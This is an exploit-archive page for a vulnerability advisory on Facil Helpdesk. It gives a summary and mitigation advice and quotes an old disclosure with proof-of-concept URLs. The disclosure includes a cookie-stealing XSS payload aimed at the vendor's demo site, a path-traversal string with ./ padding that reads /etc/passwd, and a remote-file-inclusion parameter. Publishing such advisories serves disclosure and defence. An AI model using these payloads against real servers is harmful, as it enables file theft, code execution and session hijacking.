header-logo
Suggest Exploit
vendor:
Facil Helpdesk
by:
Moudi
8,8
CVSS
HIGH
RFI/LFI/XSS
94, 98, 79
CWE
Product Name: Facil Helpdesk
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Facil Helpdesk (RFI/LFI/XSS) Multiples Vulnerabilities

Facil Helpdesk is vulnerable to multiple vulnerabilities, including Remote File Inclusion (RFI), Local File Inclusion (LFI) and Cross-Site Scripting (XSS). The vulnerable code is located in the kbase.php and index.php files. An attacker can exploit the RFI/LFI vulnerability by sending a malicious URL to the application, which can be used to execute arbitrary code on the server. The XSS vulnerability can be exploited by sending a malicious script to the application, which can be used to steal user cookies.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in the application. Additionally, developers should ensure that the application is running with the least privileges necessary.
Source

Exploit-DB raw data:

/*

              _____       _ ___        __          
             | ____|_   _(_) \ \      / /_ _ _   _ 
             |  _| \ \ / / | |\ \ /\ / / _` | | | |
             | |___ \ V /| | | \ V  V / (_| | |_| |
             |_____| \_/ |_|_|  \_/\_/ \__,_|\__, |
                                              |___/ 
                                    _____                    
                                   |_   _|__  __ _ _ __ ___  
                                      | |/ _ \/ _` | '_ ` _ \ 
                                      | |  __/ (_| | | | | | |
                                      |_|\___|\__,_|_| |_| |_|

Facil Helpdesk (RFI/LFI/XSS) Multiples Vulnerabilities

Discovered By : Moudi
Contact : <m0udi@9.cn>
Download : http://www.cromosoft.com/en/facilhelpdesk.html

Greetings : Mizoz, Zuka, str0ke, 599eme Man.

*/

[+] Exploit XSS:

- Vulnerable code in kbase.php (/).

- Poc:
  http://127.0.0.1/kbase.php/[XSS]
  http://www.demo.cromosoft.com/helpdesk/kbase/kbase.php/"><script>alert(document.cookie);</script>

[+] Exploit LFI:

- Vulnerable code in index.php (lng).

- Poc:
  http://127.0.0.1/index.php?lng=[LFI]
  http://www.demo.cromosoft.com/helpdesk/index.php?lng=[LFI]

LFI => invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

[+] Exploit RFI:

- Vulnerable code in index.php (lng).

- Poc:
  http://127.0.0.1/index.php?lng=[RFI]

# milw0rm.com [2009-08-07]